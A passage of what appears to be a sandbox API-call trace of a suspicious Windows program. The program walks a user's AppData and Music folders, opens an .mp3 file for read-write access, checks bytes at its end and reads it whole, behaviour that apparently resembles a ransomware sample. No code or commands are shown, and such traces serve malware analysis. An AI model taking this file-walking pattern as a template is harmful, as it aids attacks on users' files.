ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0217.506] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0217.506] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.506] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.506] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.506] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\") returned="IME12\\" [0217.506] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0217.506] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.506] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.506] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.507] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.507] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.507] PathFindFileNameW (pszPath="") returned="" [0217.507] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.509] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.509] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0217.509] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.509] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.509] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.509] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\") returned="IMJP12\\" [0217.509] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0217.509] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.509] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.509] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.509] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.510] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.510] PathFindFileNameW (pszPath="") returned="" [0217.510] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.510] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.510] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0217.510] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.510] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.510] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.510] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\") returned="IMJP8_1\\" [0217.511] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0217.511] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.511] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.511] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.511] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.511] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.511] PathFindFileNameW (pszPath="") returned="" [0217.511] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.512] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.512] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0217.512] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.512] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.512] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.513] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\") returned="IMJP9_0\\" [0217.513] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0217.513] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.513] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.513] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.513] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.513] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.513] PathFindFileNameW (pszPath="") returned="" [0217.513] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0217.513] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.513] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.513] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.514] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0217.514] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0217.514] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.514] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.514] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.514] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.514] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.514] PathFindFileNameW (pszPath="") returned="" [0217.514] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.515] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.515] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOMStore", cAlternateFileName="")) returned 1 [0217.515] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0217.515] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 0 [0217.515] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.515] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.515] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.516] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0217.516] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0217.516] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.516] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.516] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.516] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.516] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.516] PathFindFileNameW (pszPath="") returned="" [0217.516] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.517] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.517] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AU", cAlternateFileName="")) returned 1 [0217.517] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0217.517] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 1 [0217.517] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 0 [0217.517] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.517] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.517] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.517] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\") returned="31nXcZ37 9zWspLRsh\\" [0217.517] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\") returned="sg3CqdHoD\\" [0217.517] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\") returned="tCN4\\" [0217.517] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0217.517] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.517] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.518] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.518] PathFindFileNameW (pszPath="") returned="" [0217.518] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98a34ec0, ftCreationTime.dwHighDateTime=0x1d5def9, ftLastAccessTime.dwLowDateTime=0xca1d9ca0, ftLastAccessTime.dwHighDateTime=0x1d5e235, ftLastWriteTime.dwLowDateTime=0xca1d9ca0, ftLastWriteTime.dwHighDateTime=0x1d5e235, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.520] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98a34ec0, ftCreationTime.dwHighDateTime=0x1d5def9, ftLastAccessTime.dwLowDateTime=0xca1d9ca0, ftLastAccessTime.dwHighDateTime=0x1d5e235, ftLastWriteTime.dwLowDateTime=0xca1d9ca0, ftLastWriteTime.dwHighDateTime=0x1d5e235, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.520] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a446b0, ftCreationTime.dwHighDateTime=0x1d5e6ba, ftLastAccessTime.dwLowDateTime=0xaa043620, ftLastAccessTime.dwHighDateTime=0x1d5d800, ftLastWriteTime.dwLowDateTime=0xaa043620, ftLastWriteTime.dwHighDateTime=0x1d5d800, nFileSizeHigh=0x0, nFileSizeLow=0x10a37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p1Alcjoai8WuJl.mp3", cAlternateFileName="P1ALCJ~1.MP3")) returned 1 [0217.520] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\p1Alcjoai8WuJl.mp3") returned=".mp3" [0217.520] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\p1Alcjoai8WuJl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\31nxcz37 9zwsplrsh\\p1alcjoai8wujl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.521] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=68151) returned 1 [0217.521] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.523] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x10a11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.523] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.524] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x10a37, lpOverlapped=0x0) returned 1 